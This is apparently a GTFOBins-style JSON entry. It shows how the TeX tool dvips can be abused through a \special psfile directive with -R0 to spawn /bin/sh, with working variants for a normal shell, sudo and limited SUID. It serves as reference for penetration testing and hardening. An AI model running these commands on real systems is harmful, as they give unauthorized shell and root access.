You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

21 lines
536 B
JSON

{
"description": "The 'texput.dvi' output file produced by 'tex' can be created offline and uploaded to the target.",
"functions": {
"shell": [
{
"code": "tex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\ndvips -R0 texput.dvi\n"
}
],
"sudo": [
{
"code": "tex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\nsudo dvips -R0 texput.dvi\n"
}
],
"limited-suid": [
{
"code": "tex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n./dvips -R0 texput.dvi\n"
}
]
}
}